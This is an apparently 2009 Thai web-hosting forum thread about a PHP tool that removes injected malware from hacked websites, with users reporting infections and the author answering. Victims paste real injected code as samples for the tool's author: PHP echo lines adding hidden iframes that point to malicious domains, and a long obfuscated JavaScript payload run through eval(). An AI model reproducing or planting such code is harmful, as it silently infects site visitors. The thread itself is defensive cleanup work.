hxxp://www.thaihosttalk.com/index.php?topic=11103.msg107811#msg107811

หัวข้อ: Re: PHP Virus Remover AJAX v2.4 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: chui761 ที่ 18 พฤษภาคม 2009, 23:02:36

โอ้ว พึ่งโดนไปหมาดๆ
ผมน่าจะเจอกระทู้นี้เร็วกว่านี้
เพราะผมใช้วิธีลบไฟล์ทิ้งหมดเลย แล้วเอา back มาลงใหม่ครับ
แถมต้อง format เครื่องอีก เพราะว่ามันทำเอาคอม เอ๋อไปเลย เข้าเน็ตไม่ได้ ทั้งที่สัญญาณเน็ตปกติ
ไม่รู้ว่าอาการที่ว่านี้เกี่ยวกับไวรัสตัวนี้ด้วยหรือเปล่า

หัวข้อ: Re: PHP Virus Remover AJAX v2.4 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 18 พฤษภาคม 2009, 23:03:46

ถ้าใครเจอเหตุการณ์แบบนี้
เป็นปัญหาจาก PM ซึ่งขออนุญาตเอามายกเป็นตัวอย่าง

(http://upic.me/i/vt/iframe2.gif)

คือขึ้น Error 3 ตัว
อันแรก Permission Denied
อันที่สองและสามเป็น fwrite และ fclose

นั้นก็คือปัญหาว่าตัวโปรแกรมพยายามจะแก้ไฟล์ที่เจอปัญหา
แต่ว่ามันติด permission ของไฟล์ ดังนั้นวิธีแก้

ให้ดูว่าไฟล์ที่มีปัญหาชื่ออะไร
อย่างในภาพตัวอย่างมีสองไฟล์
readme.html และ index.php

ให้จัดการ chmod ไฟล์ที่ว่าเป็น 666 ก่อน แล้วจึงทำการรันสคริปอีกรอบ
ซึ่งรอบนี้มันจะเขียนทับได้ และมันจะไม่แจ้ง Error จะแจ้งแต่ตัวแดงว่าเจอปัญหา
แล้วพอรันเสร็จ ให้จัดการ chmod ไฟล์เหล่านี้กลับเป็น 644 เพื่อความปลอดภัย

ลองดูนะครับ :)

หัวข้อ: Re: PHP Virus Remover AJAX v2.4 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: raon10 ที่ 19 พฤษภาคม 2009, 10:44:42

ลองไปทำตรวจสอบครับได้ผลแบบนี้

คำแนะนำโดย
Safe Browsing
หน้าวินิจฉัยสำหรับ jomtienthanihotel.com
สถานะในรายการของ jomtienthanihotel.com ปัจจุบันเป็นอย่างไร

ไซต์นี้อยู่ในรายการต้องสงสัย - การเข้าชมเว็บไซต์นี้อาจก่อให้เกิดอันตรายต่อคอมพิวเตอร์ของคุณ

บางส่วนของไซต์นี้ถูกจัดอันดับไว้ในกิจกรรมที่ต้องสงสัยจำนวน 1 ครั้งเกินกว่า 90 วันที่ผ่านมา

เกิดอะไรขึ้นเมื่อ Google เยี่ยมชมไซต์นี้

เราได้ทดสอบหน้าเว็บจำนวน 3 หน้าเป็นระยะเวลาเกินกว่า 90 วันที่ผ่านมา หน้าเว็บจำนวน 0 หน้า มีซอฟต์แวร์ที่เป็นอันตรายที่กำลังถูกดาวน์โหลดและติดตั้งโดยไม่ได้รับความยินยอมจากเจ้าของเครื่อง Google เข้าชมไซต์ครั้งล่าสุดเมื่อวันที่ 2009-05-17 และพบเนื้อหาต้องสงสัยครั้งล่าสุดเมื่อวันที่ 2009-05-17
Malicious software includes 25 trojan(s).

This site was hosted on 1 network(s) including AS23352 (SERVERCENTRAL).

ไซต์นี้ทำงานเป็นเสมือนตัวกลางในการแพร่กระจายมัลแวร์ต่อไปหรือไม่

กว่า 90 วันที่ผ่านมา ไม่ปรากฏว่า jomtienthanihotel.com ทำงานเป็นเสมือนตัวกลางแพร่เชื้อให้กับไซต์ใดๆ

ไซต์นี้โฮสต์มัลแวร์หรือไม่

ใช่ ไซต์นี้โฮสต์ซอฟต์แวร์ที่เป็นอันตรายเกินกว่า 90 วันที่ผ่านมา จึงทำให้โดเมนจำนวน 4 โดเมน ติดเชื้อ รวมทั้ง mneef.net/, aljnedy.com/, nbd-m.com/ ด้วย

เกิดขึ้นได้อย่างไร

ในบางกรณี บุคคลที่สามสามารถเพิ่มรหัสที่เป็นอันตรายให้แก่ไซต์ที่ถูกต้องซึ่งจะทำให้เราแสดงผลข้อความเตือน

ขั้นตอนถัดไป:

ย้อนกลับไปหน้าก่อน
หากคุณเป็นเจ้าของเว็บไซต์นี้ คุณสามารถขอให้มีการตรวจสอบไซต์ของคุณโดยใช้ Google Webmaster Tools สำหรับรายละเอียดเพิ่มเติมเกี่ยวกับขั้นตอนการตรวจสอบ โปรดดูใน ศูนย์ช่วยเหลือสำหรับเว็บมาสเตอร์ของ Google
Updated 2 hours ago©2008 Google - หน้าแรกของ Google

ผมไม่โดนตัวที่ท่านแก้ไขกันอยู่ใช่มั๊ยครับ สงสัยต้องไปล้างระบบ :'(

หัวข้อ: Re: PHP Virus Remover AJAX v2.4 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: nexus ที่ 19 พฤษภาคม 2009, 12:54:28

ขอบคุณพี่โจ้มากครับ เก่งจริงๆเลย

หัวข้อ: Re: PHP Virus Remover AJAX v2.4 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: ปลาดิบ ที่ 19 พฤษภาคม 2009, 15:17:54

เป็นแบบนี้อ่ะคับ (http://61.19.248.235/uploads/0aa71ef7fd.gif) (http://imagehost.compgamer.com/getimg.php?img=0aa71ef7fd.gif)

หัวข้อ: Re: PHP Virus Remover AJAX v2.4 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 20 พฤษภาคม 2009, 01:56:05

เฮ้ย มันจะอนาจารอะไรกันตรงไหนเนี่ย

แม่เจ้า :P

ต้องขอเซฟเอาไว้่เพื่อความฮา เอาเป็นว่าปัญหาอยู่ที่เน็ตท่านล่ะครับ
โค้ดที่ผมเขียนไม่มีภาพอะไรเลย

:P

หัวข้อ: Re: PHP Virus Remover AJAX v2.4 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: ball6847 ที่ 20 พฤษภาคม 2009, 09:23:28

ฮาภาพพี่ปลาดิบ ;D

หัวข้อ: Re: PHP Virus Remover AJAX v2.4 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: 004275 ที่ 20 พฤษภาคม 2009, 09:58:32

ขอบคุณคับ

หัวข้อ: Re: PHP Virus Remover AJAX v2.4 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: PIN ที่ 20 พฤษภาคม 2009, 16:16:35

ขอบคุณคุณโจ้มาก ๆ ครับ เว็บผมเยอะ ได้ัตัวนี้ช่วยแจ่มสุด ๆ เจอกันสักวันจะเลี้ยงข้าวให้กลิ้งกลับบ้านเลย อิอิ

หัวข้อ: Re: PHP Virus Remover AJAX v2.5 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 22 พฤษภาคม 2009, 12:16:55

ผมอัพเดตเพิ่มนะครับ ตาม PM จากคุณ reset
ผมจะบอกว่าใครถามมาเป็นระยะ เพราะถือว่าช่วยในการ research
หลายท่านที่เคยถามทาง PM มา ก็ช่วยให้ความร่วมมือในการเข้าถึง FTP
เพราะมันง่ายที่จะตรวจสอบจากไฟล์ตรงๆ และอีกอย่าง
ปกติอย่างผมเอง ก็มักไม่อยากให้คนอื่นเข้าถึง FTP
ประมาณว่าถ้าไม่กล้าพอ คงไม่กล้าให้คนอื่นเข้าถึง FTP

กลับมาเรื่องการอัพเดต มีการอัพเดตใหม่ที่โค้ดส่วน iframe
ให้จัดการมันทุก iframe ที่เข้าข่าย เป็น iframe ของเว็บอื่นและโดนซ่อนด้วย css ให้แสดงไม่เห็น
คิดว่าต่อไปน่าจะจัดการได้หมดครับ แต่ทุกอย่างล้วนมีจุดอ่อนเหมือนกัน

ช่วงนี้ปั่นงานยุ่งๆ นี้ก็เพิ่งซื้อเทมเพลตจาก themeforest มายำเว็บลูกค้าเพิ่ม
ผมไม่ได้จะโฆษณา ref ที่อยู่ที่ลายเซ็นนะ ที่ติดก็หวังผลพลอยได้ (ฮา)
แต่จริงๆ สนับสนุนให้ใช้เทมเพลตถูกลิขสิทธิ์หน่อย เพราะเวลามานั่งออกแบบเอง
ถึงรู้ว่ามันยากแฮะ ยอมเสียสัก 300 กว่าบาท แล้วได้เทมสวย อาจมีใช้ซ้ำไม่กี่คน
แต่ผมว่าคุ้ม และสบายใจ

กลับเข้าเรื่องอีกนิด ใครอยากส่งเว็บที่มีปัญหามาถาม ก็ส่งมาเลยนะครับ
แต่อาจตอบกลับช้าหน่อย ก็อย่าว่ากันนะ :P

แล้วถ้าคิดว่าแก้ปัญหาเองไม่ได้ ก็รบกวนส่ง FTP มาด้วย เพราะต้องดูที่โค้ดบนโฮสจริงๆ
ยังไงแนะนำให้เปลี่ยนพาส ftp ก่อน เพราะมีบางท่านส่ง pass ใช้ปัจจุบันมาให้มั้ง
ถึงแม้เป็นผม ก็อย่าไว้ใจเป็นดีสุดครับ

ส่วนใครรู้ว่าเกิดจากจุดไหนของไฟล์ ก็ส่งข้อมูลมาแนะนำได้เลยครับ
ให้แนะนำมาผมก็ให้เครดิตหมด ถ้าตกหล่นก็ทวงมาได้เลย
ถือว่าช่วยกันเพราะยังไงก็ยังมีเว็บมาสเตอร์หลายท่านที่ไม่เก่ง php
มันเลยเป็นจุดอ่อนให้พวกนี้ มันแทรกโค้ดเอาซะคนอื่นไม่เห็น

:P

ส่วนผมไปทำงานต่อ เชื่อไหม ผมดองงานมาครึ่งปี คือมันไม่เสร็จซักกะที
โชคดีว่าเป็นงานของญาติ เขาไม่ว่าอะไร แต่ถามมาทีไร ผมจี๊ดในหัวใจทุกที

:'(

หัวข้อ: Re: PHP Virus Remover AJAX v2.5 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: Step9 ที่ 22 พฤษภาคม 2009, 13:05:59

เพิ่งโดนเมื่อกี้ใช้ v1.3 โจ้ มันไม่สิ้นซาก
ตอนนี้แก้ด้วยมือไปแล้ว และsave V2.5 ไว้แล้ว

ถ้าใช้คิปลบมันมักไปลบ

}

?>

ทำให้สคริป <?PHP มันจบไม่ได้เว็บพังหมดเลย :P

หัวข้อ: Re: PHP Virus Remover AJAX v2.5 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 22 พฤษภาคม 2009, 13:22:54

อ้างจาก: Step9 ที่ 22 พฤษภาคม 2009, 13:05:59

สคริปผมมันลบ
}

?>

ไปด้วยเหรอครับ ?

งงแฮะว่ามันเอาส่วนไหนไปลบ

หัวข้อ: Re: PHP Virus Remover AJAX v2.5 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: Step9 ที่ 22 พฤษภาคม 2009, 13:32:00

ไว้โดนใหม่จะจับไฟล์ต้นฉบับ1
ไฟล์ที่โดน iframe1

เทียบอีกทีว่ามันแทรกยังไงของมัน

พอดีเจอปุ๊ปRunสคริปโจ้ เลย พอเข้าไปดูไฟล์มันแหว่ง :P
บางทีiframeมันอาจเนียนมาใช้ codeดังกล่าวร่วมกัน (ไหมนี่)

:-X

---
code iframe

โค๊ด:

echo "<iframe src=\"http://clifedo.net/?click=B9EB75\" width=1 height=1 style=\"visibility:hidden;positio
<iframe src="http://greatnamemovie.cn:8080/ts/in.cgi?pepsi18" width=12 height=12 style="visibility: hidden"></iframe>

ดูดู๊ดู ทำแฮดทริกในไฟล์เดียว :(

โค๊ด:

echo "<iframe src=\"http://clifedo.net/?click=BDC53C\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";



echo "<iframe src=\"http://internetcountercheck.com/?click=17126421\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";



echo "<iframe src=\"http://vafuiek.com/?click=15FCB05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

หัวข้อ: Re: PHP Virus Remover AJAX v2.5 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: g-ji ที่ 22 พฤษภาคม 2009, 13:48:28

อยากรู้จังคนเขียนสคริปท์ iframe จิตใจทำด้วยอะไร ทำไม โหดขนาดนี้ :P

หัวข้อ: Re: PHP Virus Remover AJAX v2.5 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: reset ที่ 22 พฤษภาคม 2009, 15:20:11

ขอบคุณ คุณ โจ้ มากครับ
เจ้า iframe ตัวนี้เล่นผม มึนไปเลย ล้างแล้วล้างอีก

ครั้งนี้คงจะลาขาดกับ มันได้แล้ว นะ

:P

ปล.กำลังไล่สแกน อยุ่ครับ

หัวข้อ: Re: PHP Virus Remover AJAX v2.5 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 24 พฤษภาคม 2009, 09:25:02

อ้างจาก: Step9 ที่ 22 พฤษภาคม 2009, 13:32:00

พอดีเจอปุ๊ปRunสคริปโจ้ เลย พอเข้าไปดูไฟล์มันแหว่ง :P
บางทีiframeมันอาจเนียนมาใช้ codeดังกล่าวร่วมกัน (ไหมนี่)

:-X

คือโค้ดที่ผมเขียน มันจะลบแก้ไข ก็อ้างอิงจาก regex ที่มี
ซึ่งไม่มีตัวไหนเลยที่มันจะไปลบตัวนั้น

อีกอย่าง ต่อให้เป็นเรื่องความผิดพลาดของการเขียนไฟล์ ซึ่งโอกาสมัน 0.00000001
ก็จะอยู่ในรูปไฟล์เปล่า (ไม่มีสักอักษร) หรือ ไฟล์หาย

:P

อ้างจาก: pling ที่ 23 พฤษภาคม 2009, 16:32:09

โอยโดนเวปทั้งหมดใน host hm เลยครับ ลองรันคิปโจ้แล้วมันก็นิ่งไปเลยมันจะ checking เวปไปเรื่อยๆแล้วจะหยุดครับ ไม่ทราบว่าต้องทำอย่างไรต่อดีครับ

บอกตามตรงว่าทำใจจริงๆ เพราะแสดงว่ามันเยอะจัด ต้องรันแยกทีละโดเมนละครับ
เพราะผมเขียนให้มันซอยในการตรวจโฟลเดอร์ด้วย ajax ขนาดนี้แล้ว
ถ้ายังมีสภาพแบบนี้ แปลว่ามันเกินที่ php จะตรวจไหว

:P

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: mapandy ที่ 25 พฤษภาคม 2009, 11:06:20

ผมโดนฝังสคริปต์นี้ครับ

โค๊ด:

<script>var ABwRxE="X2H61X2H";var EInecw9n="A9g64%BRA";var ICAIcP="X2H3DX2H6";var mTwhvHE="e(/oun/";var BZpAD="74%BRA9g6";var pIXcLl2S="2H67X2H";var Sqf8="02U6D02U6502U3";var oiiv4D="%BRA9g68%BRA9g";var wHAJ="9g79%BRA9g4Do";var L5a1DG="A9g29ounB';e";wHAJ="%BRA9g4D%BRA"+wHAJ;var HADxBu="='%BRA9g64%BRA9";var ooHKQVq="7%BRA9g";var G4C9dD="6Y4D6Y7R";var sNgYKY="%BRA9g6D%BRA";var HSiqRp="H22X2H3BX2H69";var kctKYuGO="nD%BRA9g64%BRA";var PfV7pN0b="EX2H62";ooHKQVq="1%BRA9g6"+ooHKQVq;var IgD5="(Rb55.r";var rH3a="A9g6E%BRA9g74%";var eMBZEbyJ="D02U3c7";var w7KJZG7A=".replace(/c/g,";var Q5FYCN="69X2H76X2H20X2H";var yLhhco="2U7502U6202";var qb7U4t="X2H27X2H";var aw9Hj="E%BRA9g74%BRA9";var hj6I="1X2H67X2H7";var RLrUASt="4D6Y7R6";var B8DERO6="'%')));";var RppFihTv="A9g66%";var nbrr="%BRA9g72%BRA9g2";var z0iVgyc=");var R";var bFqJzREV="2H%Lb7X2H68X2";Q5FYCN+="69X2HWL";var EykK="U2702U3B';";nbrr="BRA9g61"+nbrr;var nWhnNJ="H3CX2H2FX2HWL";var RViE="E%BRA9g74%BRA9";var BAiVh3IE="g64%BRA9g";var Ahiv="H3CX2H62";var jUKZFWM="2702U3102U2";var HyiVNImo="g65%BRA";var KCUev="902U4D02U3c";var mw0szU="RA9g65%";hj6I="2X2H20X2H7"+hj6I;var W03BBU="2U2702U6c7";Ahiv="bX2H3DX2H27X2"+Ahiv;ooHKQVq+="79oun6%BRA9";mTwhvHE="').replac"+mTwhvHE;oiiv4D+="27%BRA9g29o";oiiv4D+="unB%BR";HyiVNImo+="9g6D%BRA9g65%";var xQgtmCM="X2H22X";var uueXRl="Y6R6Y746Y7R6Y";var b21QUBg="2U2E02U770";var FqyaNKF1="(/%Lb/";PfV7pN0b="2H6EX2H7%LbX2H2"+PfV7pN0b;RViE=HyiVNImo+"BRA9g6"+RViE;var FH2jWr="6Y686Y6R6Y646Y6";var SiWXj="02U2F02";var DmQVS5="2F02U4";var GrnG="eplace(/RA9/g";var WPd3ypyX="U4402U7902U";Ahiv+="X2H6FX2HWLb";var VcpyI="U5402U4902";var p7zMFDBB="7202U6";aw9Hj+="g2E%BRA9g77%BR";z0iVgyc=mTwhvHE+"g,'%3'))"+z0iVgyc;EykK="2U7002U4402"+EykK;var VqIu3j8="BRA9g6";var Giu5="02U3102U2702U3";qb7U4t+="3B';eval(une";var h8zoe="28X2HWLbX2H";var jgsFTb7="9g6E%BRA9g74%BR";mw0szU="g63%BRA9g72%B"+mw0szU;Q5FYCN=xQgtmCM+"2H3CX2HWLbX2H"+Q5FYCN;L5a1DG="g27%BR"+L5a1DG;var PMGa="02U3602U4F02";b21QUBg="U3602U4F0"+b21QUBg;var NYaSFEVL="ypM='X2H76X2H";var YrSkVOD="U6C02U27";rH3a+="BRA9g2";ICAIcP="9X2H3D"+ICAIcP;var EYbQiNB="R6Y626Y";var wu8EK="61%BRA9g72";var Xr15J="BRA9g7";var FLCJ43="g61%BRA9g4";KCUev+="7902U6F02U3";B8DERO6="eplace(/6Y/g,"+B8DERO6;wHAJ=wu8EK+"%BRA9g20"+wHAJ;var rqiAczo="CHAPL.repla";RLrUASt="Y6C6Y646Y286Y"+RLrUASt;IgD5+="eplace(/02U/";ooHKQVq="g28%BRA9g7"+ooHKQVq;L5a1DG+="val(une";RppFihTv="RA9g69%BR"+RppFihTv;L5a1DG="65%BRA9"+L5a1DG;qb7U4t+="scape(";Xr15J="RA9g63%"+Xr15J;KCUev=jUKZFWM+"702U3B02U4D02U7"+KCUev;GrnG+=",'q').repla";z0iVgyc=GrnG+"ce(/%Bqg/g,'%"+z0iVgyc;eMBZEbyJ=Giu5+"B02U4D02U7902U4"+eMBZEbyJ;var j0Nq="g65%BRA9g74%B";var JVVX="16Y706Y706Y656Y";FH2jWr+="46Y656Y6E";nWhnNJ+="bX2H69X2H7";oiiv4D="%BRA9g68"+oiiv4D;h8zoe=HSiqRp+"X2H66X2H"+h8zoe;VqIu3j8="63%BRA9g75%"+VqIu3j8;var GZl2lgtB="BRA9g2E%BR";var ucTY2To9="A9g61%BRA9";var hCdrz8z="7902U4D02U";var KShw="FX2H62X2H6FX2";YrSkVOD="02U4D02U6102"+YrSkVOD;var D3XN="c6502U6";jgsFTb7+="A9g42%BRA9g79%";qb7U4t=KShw+"HWLbX2H79X2H3E"+qb7U4t;var pRBrw="A9g62%BRA9";var PbFZj="2U6202U6102U720";D3XN=KCUev+"602U4F02U2E02U6"+D3XN;G4C9dD+="6Y4D6Y386Y7R6Y6";Xr15J+="5%BRA9g6D";ooHKQVq="0%BRA9"+ooHKQVq;var fKVTCoT="6Y646Y7R6Y4D6Y";rH3a=Xr15J+"%BRA9g65%BR"+rH3a;var MnnlnK1="2U6202";EYbQiNB="R6Y736Y6"+EYbQiNB;Sqf8="6E02U61"+Sqf8;var pZ1qdI="%BRA9g6C%";PMGa=hCdrz8z+"3c7902U6F"+PMGa;mw0szU=rH3a+"E%BRA9"+mw0szU;Ahiv+="X2H79X2H3EX2H2";FqyaNKF1="replace"+FqyaNKF1;YrSkVOD=DmQVS5+"602U72"+YrSkVOD;RViE="5%BRA9g6C%BRA9"+RViE;PbFZj=MnnlnK1+"U6C02U650"+PbFZj;kctKYuGO+="9g6F%BRA9g63";ooHKQVq="%BRA9g65%BRA9g2"+ooHKQVq;B8DERO6=rqiAczo+"ce(/R/g,'9').r"+B8DERO6;WPd3ypyX=Sqf8+"D02U2702"+WPd3ypyX;var LGFh="g,'%')));var";FLCJ43=BAiVh3IE+"28%BRA9g27%BRA9"+FLCJ43;var mTR9Uy="02U6402U2E02U77";W03BBU+="402U7402U";mw0szU=EInecw9n+"9g6F%B"+mw0szU;Ahiv=pIXcLl2S+"79X2H36X2H5%L"+Ahiv;FLCJ43=jgsFTb7+"BRA9g49%BRA9"+FLCJ43;ooHKQVq="9%BRA9g74"+ooHKQVq;NYaSFEVL="var yUB6"+NYaSFEVL;wHAJ=oiiv4D+"A9g76%BRA9g"+wHAJ;FH2jWr=uueXRl+"3D6Y27"+FH2jWr;var tVePz="Y4F6Y2E6Y736Y7";BZpAD=mw0szU+"BRA9g61%BRA9g"+BZpAD;tVePz+="46Y7R6Y6C6Y656Y";b21QUBg+="2U6902U6402U740";tVePz=G4C9dD+"F6Y366"+tVePz;Q5FYCN="H5%LbX2H3D"+Q5FYCN;JVVX+="6E6Y646Y436Y";var qnEYR0="366Y4F6Y2R6Y3";qnEYR0="6Y6F6Y"+qnEYR0;ICAIcP+="EX2H75X2H6CX2";p7zMFDBB=PMGa+"U2E02U7302U"+p7zMFDBB;D3XN=b21QUBg+"2U6c3D02U"+D3XN;RViE=BZpAD+"5%BRA9g4"+RViE;wHAJ+="un8%BRA9g79%BR";WPd3ypyX="4F02U2E02U"+WPd3ypyX;VqIu3j8=HADxBu+"g6F%BRA9g"+VqIu3j8;nbrr="29ounB%BRA9g76%"+nbrr;w7KJZG7A=IgD5+"g,'%')"+w7KJZG7A;kctKYuGO="%BRA9g4Doun6ou"+kctKYuGO;RppFihTv=RViE+"g28%BRA9g27%B"+RppFihTv;EYbQiNB=tVePz+"2E6Y766Y6"+EYbQiNB;qb7U4t+="yUB6ypM.repl";JVVX=fKVTCoT+"366Y2E6Y6"+JVVX;L5a1DG=ucTY2To9+"g6D%BRA9g"+L5a1DG;WPd3ypyX=eMBZEbyJ+"902U6F02U3602U"+WPd3ypyX;GZl2lgtB="RA9g6E%BRA9g74%"+GZl2lgtB;VcpyI=WPd3ypyX+"3902U6F02"+VcpyI;ICAIcP=PfV7pN0b+"X2H6FX2HWLbX2H7"+ICAIcP;L5a1DG=RppFihTv+"BRA9g72%BR"+L5a1DG;var xRVOH="2U2E02U6202U6F";pZ1qdI+="BRA9g65%BRA9g";ooHKQVq=aw9Hj+"A9g72%BRA9g6"+ooHKQVq;FH2jWr+="6Y276Y3";mTR9Uy="C02U65"+mTR9Uy;var ODHMv="2H79X2H36X2H";L5a1DG="9g4FounD%BR"+L5a1DG;qnEYR0+="B';eval(un";pZ1qdI=j0Nq+"RA9g45"+pZ1qdI;VcpyI="U6c7402U3D02U27"+VcpyI;var hHDNuiX="02U4D02U";RLrUASt=JVVX+"686Y6R6"+RLrUASt;L5a1DG+="scape(zY";B8DERO6=qnEYR0+"escape(LP"+B8DERO6;qb7U4t="2H3CX2H2"+qb7U4t;qb7U4t=ODHMv+"5%LbX2H2BX2H27X"+qb7U4t;p7zMFDBB=z0iVgyc+"b55='02U4D02U"+p7zMFDBB;D3XN=hHDNuiX+"3c7902U6F02"+D3XN;ooHKQVq="g65%BRA9g6"+ooHKQVq;W03BBU=p7zMFDBB+"302U3D0"+W03BBU;VqIu3j8=LGFh+" zYW2UKe8"+VqIu3j8;wHAJ=FLCJ43+"Coun7%BRA9g47"+wHAJ;mTR9Uy=PbFZj+"2U6502U6C02U6"+mTR9Uy;VcpyI=D3XN+"902U6702"+VcpyI;B8DERO6=RLrUASt+"Y4D6Y386Y7R"+B8DERO6;EykK=VcpyI+"U3502U390"+EykK;FH2jWr=EYbQiNB+"6R6Y6C6"+FH2jWr;pRBrw=nbrr+"0%BRA9g47%BR"+pRBrw;Ahiv=ICAIcP+"H6CX2H29X2H71X"+Ahiv;h8zoe=nWhnNJ+"6X2H3EX2"+h8zoe;pRBrw=ooHKQVq+"g54%BRA9g"+pRBrw;qb7U4t="2H71X2H67X"+qb7U4t;wHAJ=pZ1qdI+"6D%BRA9g65%BRA"+wHAJ;h8zoe="2H3EX2"+h8zoe;ABwRxE=Q5FYCN+"bX2H3DX2H27"+ABwRxE;bFqJzREV=ABwRxE+"%LbCX2H37X"+bFqJzREV;L5a1DG=wHAJ+"A9g6Foun6%BRA"+L5a1DG;w7KJZG7A=EykK+"eval(unescape"+w7KJZG7A;SiWXj=W03BBU+"7002U3A02U2F"+SiWXj;hj6I=NYaSFEVL+"61X2H7"+hj6I;mTR9Uy=xRVOH+"02U750"+mTR9Uy;mTR9Uy=yLhhco+"U6C02U650"+mTR9Uy;qb7U4t=Ahiv+"7X2H2BX"+qb7U4t;VqIu3j8="eplace(/X2H/"+VqIu3j8;FqyaNKF1=qb7U4t+"ace(/W/g,'6%')."+FqyaNKF1;h8zoe=bFqJzREV+"H68X2H27X"+h8zoe;w7KJZG7A=YrSkVOD+"02U3B02U4D02U79"+w7KJZG7A;FqyaNKF1="5X2H6DX2H65X"+FqyaNKF1;kctKYuGO=pRBrw+"g64%BRA9g79"+kctKYuGO;SiWXj=L5a1DG+"W2UKe8.r"+SiWXj;h8zoe=hj6I+"9X2H36X2"+h8zoe;FqyaNKF1=h8zoe+"6FX2H63X2H7"+FqyaNKF1;FH2jWr="var LPCHAPL='"+FH2jWr;mTR9Uy=SiWXj+"U6402U6F0"+mTR9Uy;mTR9Uy=GZl2lgtB+"A9g67%BRA9"+mTR9Uy;mTR9Uy=sNgYKY+"9g65%B"+mTR9Uy;FH2jWr=w7KJZG7A+"'8%')));"+FH2jWr;FH2jWr=mTR9Uy+"02U7302U"+FH2jWr;kctKYuGO=VqIu3j8+"D%BRA9"+kctKYuGO;FH2jWr=kctKYuGO+"%BRA9g75"+FH2jWr;B8DERO6=FH2jWr+"B6Y476Y62"+B8DERO6;B8DERO6=FqyaNKF1+"g,'4').r"+B8DERO6;eval(B8DERO6);</script>

ลองใช้สแกนแล้ว มันไม่หายอ่ะครับ :P

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: Finish ที่ 28 พฤษภาคม 2009, 09:42:02

เวอร์ชั่น 2.6 นี่ ดาวน์โหลดจากที่ไหนครับ
ผมโหลดจากหนาแรกมาเป็น 2.5

ผมรันแล้วขึ้นแบบนี้

PHP Virus Remover AJAX - v2.5

โปรแกรมนี้จะทำงานทั้งหมด 2 ขั้นตอน
1. ตรวจหาไฟล์ที่มีปัญหา
2. จัดการแก้ไขไฟล์เหล่านั้น

Idle....

Run File Extension Checker...
Checking: /...
Checking: /wpau-backup/...
Checking: /wp-content/...
Checking: /wp-includes/...
Checking: /cgi-bin/...
Checking: /wp-admin/...
Checking: /wp-content/upgrade/...
Checking: /wp-content/themes/...
Checking: /wp-content/uploads/...
Checking: /wp-content/plugins/...

อันนี้แสดงว่า ตรวจแล้วไม่เจอใช่หรือไม่ครับ
หรือว่า มันกำลังหายังไม่เสร็จ

ขอบคุณครับ

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: sssii ที่ 28 พฤษภาคม 2009, 22:45:57

หนักเหมือนกัน ลบไม่หมด ชักเหนื่อย

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: sealinda ที่ 31 พฤษภาคม 2009, 01:10:22

ในที่สุดก็ intrend กะเค้า :-X ควรดีใจใช่ม้ายยย :-X

(http://i101.photobucket.com/albums/m70/sealinda/malicioussoftware.jpg)

Google ขึ้นเตือนว่า "Malicious software includes 28 exploit(s)"
มันหมายถึงโดนไป 28 ไฟล์รึเปล่าอ่ะ ??? ???
แต่ว่า ลองใช้สคริปของน้องโจ้แล้ว มันลบไป 3 อัน

(http://i101.photobucket.com/albums/m70/sealinda/deleted3files.jpg)

ซึ่งจากชื่อที่ Google ระบุมา ไม่มี gumblar.cn เหมือนของน้องกิว
แต่ว่าสคริปน้องโจ้ลบได้ แปลว่าโจ้ได้อัพเดทเว็บอื่นๆ เข้าไปด้วยแล้วหรอคะ?

เรื่องสุดท้าย คงต้องรบกวนน้องโจ้เข้าไปดูที่ FTP ให้หน่อยนะคะ :P เพราะพี่เดาว่าสคริปน่าจะยังลบออกไม่หมด :P :P (เพราะพี่หาเองม่ายยยเจอออ :-X )
และจะได้เอาชื่อเว็บ ชื่อไวรัส มาอัพเดทสคริปกัน ป้องกันคนอื่นๆ โดนด้วย :-X

ขอบคุณมากมายสำหรับสคริป และ ความช่วยเหลืออ่ะ :-X

หัวข้อ: Re: PHP Virus Remover AJAX v2.6 By EThaiZone (อัพเกรดยกระบบ)
เริ่มหัวข้อโดย: EThaiZone ที่ 31 พฤษภาคม 2009, 01:25:05

@mapandy เดี๋ยวจะปรับปรุงให้ครับ (คงพรุ่งนี้นะ)

@pling โหลดเวอร์ชั่นที่ใช้กับ Cpanel ไปใช้แทนครับ

@Finish เป็นความผิดพลาดผมเองครับ ลืมแก้เลขเวอร์ชั่นในตัวไฟล์
แต่ให้สังเกตหัวไฟล์ครับ ตรงนี้ไม่ลืม ^^"
ส่วนที่ขึ้น Checking คือมันกำลังตรวจหาไฟล์ที่เป็นนามสกุลที่ควรตรวจ
"php", "css", "tpl", "js", "html", "htm", "txt", "php3", "inc"
พอหาไฟล์พวกนี้ครบ มันจะเก็บเป้นลิส แล้วถึงเข้าขั้นตอนสอง
ในการไล่ตรวจทีละไฟล์ และจัดการลบครับ :P

